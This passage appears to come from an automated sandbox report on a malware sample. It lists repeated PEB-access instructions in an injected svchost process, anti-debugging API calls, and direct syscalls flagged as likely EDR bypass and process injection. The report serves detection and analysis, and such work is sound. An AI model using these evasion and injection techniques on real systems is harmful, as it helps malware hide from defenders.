Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030325E0 mov eax, dword ptr fs:[00000030h]	3_2_030325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306C5ED mov eax, dword ptr fs:[00000030h]	3_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306C5ED mov eax, dword ptr fs:[00000030h]	3_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03068402 mov eax, dword ptr fs:[00000030h]	3_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03068402 mov eax, dword ptr fs:[00000030h]	3_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03068402 mov eax, dword ptr fs:[00000030h]	3_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302E420 mov eax, dword ptr fs:[00000030h]	3_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302E420 mov eax, dword ptr fs:[00000030h]	3_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302E420 mov eax, dword ptr fs:[00000030h]	3_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302C427 mov eax, dword ptr fs:[00000030h]	3_2_0302C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B6420 mov eax, dword ptr fs:[00000030h]	3_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B6420 mov eax, dword ptr fs:[00000030h]	3_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B6420 mov eax, dword ptr fs:[00000030h]	3_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B6420 mov eax, dword ptr fs:[00000030h]	3_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B6420 mov eax, dword ptr fs:[00000030h]	3_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B6420 mov eax, dword ptr fs:[00000030h]	3_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B6420 mov eax, dword ptr fs:[00000030h]	3_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306A430 mov eax, dword ptr fs:[00000030h]	3_2_0306A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]	3_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]	3_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]	3_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]	3_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]	3_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]	3_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]	3_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306E443 mov eax, dword ptr fs:[00000030h]	3_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030EA456 mov eax, dword ptr fs:[00000030h]	3_2_030EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302645D mov eax, dword ptr fs:[00000030h]	3_2_0302645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305245A mov eax, dword ptr fs:[00000030h]	3_2_0305245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030BC460 mov ecx, dword ptr fs:[00000030h]	3_2_030BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305A470 mov eax, dword ptr fs:[00000030h]	3_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305A470 mov eax, dword ptr fs:[00000030h]	3_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305A470 mov eax, dword ptr fs:[00000030h]	3_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030EA49A mov eax, dword ptr fs:[00000030h]	3_2_030EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030364AB mov eax, dword ptr fs:[00000030h]	3_2_030364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030644B0 mov ecx, dword ptr fs:[00000030h]	3_2_030644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030BA4B0 mov eax, dword ptr fs:[00000030h]	3_2_030BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030304E5 mov ecx, dword ptr fs:[00000030h]	3_2_030304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03104B00 mov eax, dword ptr fs:[00000030h]	3_2_03104B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]	3_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]	3_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]	3_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]	3_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]	3_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]	3_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]	3_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]	3_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AEB1D mov eax, dword ptr fs:[00000030h]	3_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305EB20 mov eax, dword ptr fs:[00000030h]	3_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305EB20 mov eax, dword ptr fs:[00000030h]	3_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030F8B28 mov eax, dword ptr fs:[00000030h]	3_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030F8B28 mov eax, dword ptr fs:[00000030h]	3_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E4B4B mov eax, dword ptr fs:[00000030h]	3_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E4B4B mov eax, dword ptr fs:[00000030h]	3_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03102B57 mov eax, dword ptr fs:[00000030h]	3_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03102B57 mov eax, dword ptr fs:[00000030h]	3_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03102B57 mov eax, dword ptr fs:[00000030h]	3_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03102B57 mov eax, dword ptr fs:[00000030h]	3_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030C6B40 mov eax, dword ptr fs:[00000030h]	3_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030C6B40 mov eax, dword ptr fs:[00000030h]	3_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030FAB40 mov eax, dword ptr fs:[00000030h]	3_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D8B42 mov eax, dword ptr fs:[00000030h]	3_2_030D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03028B50 mov eax, dword ptr fs:[00000030h]	3_2_03028B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DEB50 mov eax, dword ptr fs:[00000030h]	3_2_030DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302CB7E mov eax, dword ptr fs:[00000030h]	3_2_0302CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040BBE mov eax, dword ptr fs:[00000030h]	3_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040BBE mov eax, dword ptr fs:[00000030h]	3_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	3_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	3_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03050BCB mov eax, dword ptr fs:[00000030h]	3_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03050BCB mov eax, dword ptr fs:[00000030h]	3_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03050BCB mov eax, dword ptr fs:[00000030h]	3_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03030BCD mov eax, dword ptr fs:[00000030h]	3_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03030BCD mov eax, dword ptr fs:[00000030h]	3_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03030BCD mov eax, dword ptr fs:[00000030h]	3_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DEBD0 mov eax, dword ptr fs:[00000030h]	3_2_030DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03038BF0 mov eax, dword ptr fs:[00000030h]	3_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03038BF0 mov eax, dword ptr fs:[00000030h]	3_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03038BF0 mov eax, dword ptr fs:[00000030h]	3_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305EBFC mov eax, dword ptr fs:[00000030h]	3_2_0305EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030BCBF0 mov eax, dword ptr fs:[00000030h]	3_2_030BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030BCA11 mov eax, dword ptr fs:[00000030h]	3_2_030BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306CA24 mov eax, dword ptr fs:[00000030h]	3_2_0306CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305EA2E mov eax, dword ptr fs:[00000030h]	3_2_0305EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03054A35 mov eax, dword ptr fs:[00000030h]	3_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03054A35 mov eax, dword ptr fs:[00000030h]	3_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306CA38 mov eax, dword ptr fs:[00000030h]	3_2_0306CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03036A50 mov eax, dword ptr fs:[00000030h]	3_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03036A50 mov eax, dword ptr fs:[00000030h]	3_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03036A50 mov eax, dword ptr fs:[00000030h]	3_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03036A50 mov eax, dword ptr fs:[00000030h]	3_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03036A50 mov eax, dword ptr fs:[00000030h]	3_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03036A50 mov eax, dword ptr fs:[00000030h]	3_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03036A50 mov eax, dword ptr fs:[00000030h]	3_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040A5B mov eax, dword ptr fs:[00000030h]	3_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040A5B mov eax, dword ptr fs:[00000030h]	3_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306CA6F mov eax, dword ptr fs:[00000030h]	3_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306CA6F mov eax, dword ptr fs:[00000030h]	3_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306CA6F mov eax, dword ptr fs:[00000030h]	3_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DEA60 mov eax, dword ptr fs:[00000030h]	3_2_030DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030ACA72 mov eax, dword ptr fs:[00000030h]	3_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030ACA72 mov eax, dword ptr fs:[00000030h]	3_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]	3_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]	3_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]	3_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]	3_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]	3_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]	3_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]	3_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]	3_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303EA80 mov eax, dword ptr fs:[00000030h]	3_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03104A80 mov eax, dword ptr fs:[00000030h]	3_2_03104A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03068A90 mov edx, dword ptr fs:[00000030h]	3_2_03068A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03038AA0 mov eax, dword ptr fs:[00000030h]	3_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03038AA0 mov eax, dword ptr fs:[00000030h]	3_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03086AA4 mov eax, dword ptr fs:[00000030h]	3_2_03086AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03086ACC mov eax, dword ptr fs:[00000030h]	3_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03086ACC mov eax, dword ptr fs:[00000030h]	3_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03086ACC mov eax, dword ptr fs:[00000030h]	3_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03030AD0 mov eax, dword ptr fs:[00000030h]	3_2_03030AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03064AD0 mov eax, dword ptr fs:[00000030h]	3_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03064AD0 mov eax, dword ptr fs:[00000030h]	3_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306AAEE mov eax, dword ptr fs:[00000030h]	3_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306AAEE mov eax, dword ptr fs:[00000030h]	3_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AE908 mov eax, dword ptr fs:[00000030h]	3_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AE908 mov eax, dword ptr fs:[00000030h]	3_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030BC912 mov eax, dword ptr fs:[00000030h]	3_2_030BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03028918 mov eax, dword ptr fs:[00000030h]	3_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03028918 mov eax, dword ptr fs:[00000030h]	3_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B892A mov eax, dword ptr fs:[00000030h]	3_2_030B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030C892B mov eax, dword ptr fs:[00000030h]	3_2_030C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B0946 mov eax, dword ptr fs:[00000030h]	3_2_030B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03104940 mov eax, dword ptr fs:[00000030h]	3_2_03104940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03056962 mov eax, dword ptr fs:[00000030h]	3_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03056962 mov eax, dword ptr fs:[00000030h]	3_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03056962 mov eax, dword ptr fs:[00000030h]	3_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0307096E mov eax, dword ptr fs:[00000030h]	3_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0307096E mov edx, dword ptr fs:[00000030h]	3_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0307096E mov eax, dword ptr fs:[00000030h]	3_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D4978 mov eax, dword ptr fs:[00000030h]	3_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D4978 mov eax, dword ptr fs:[00000030h]	3_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030BC97C mov eax, dword ptr fs:[00000030h]	3_2_030BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]	3_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]	3_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]	3_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]	3_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]	3_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]	3_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]	3_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]	3_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]	3_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]	3_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]	3_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]	3_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]	3_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030309AD mov eax, dword ptr fs:[00000030h]	3_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030309AD mov eax, dword ptr fs:[00000030h]	3_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B89B3 mov esi, dword ptr fs:[00000030h]	3_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B89B3 mov eax, dword ptr fs:[00000030h]	3_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B89B3 mov eax, dword ptr fs:[00000030h]	3_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030C69C0 mov eax, dword ptr fs:[00000030h]	3_2_030C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030649D0 mov eax, dword ptr fs:[00000030h]	3_2_030649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030FA9D3 mov eax, dword ptr fs:[00000030h]	3_2_030FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030BE9E0 mov eax, dword ptr fs:[00000030h]	3_2_030BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030629F9 mov eax, dword ptr fs:[00000030h]	3_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030629F9 mov eax, dword ptr fs:[00000030h]	3_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030BC810 mov eax, dword ptr fs:[00000030h]	3_2_030BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03052835 mov eax, dword ptr fs:[00000030h]	3_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03052835 mov eax, dword ptr fs:[00000030h]	3_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03052835 mov eax, dword ptr fs:[00000030h]	3_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03052835 mov ecx, dword ptr fs:[00000030h]	3_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03052835 mov eax, dword ptr fs:[00000030h]	3_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03052835 mov eax, dword ptr fs:[00000030h]	3_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306A830 mov eax, dword ptr fs:[00000030h]	3_2_0306A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D483A mov eax, dword ptr fs:[00000030h]	3_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D483A mov eax, dword ptr fs:[00000030h]	3_2_030D483A

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_004580A9

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042A155
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0042A124 SetUnhandledExceptionFilter,	0_2_0042A124
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B91361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B91361
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B94C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00B94C7B

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtOpenKeyEx: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
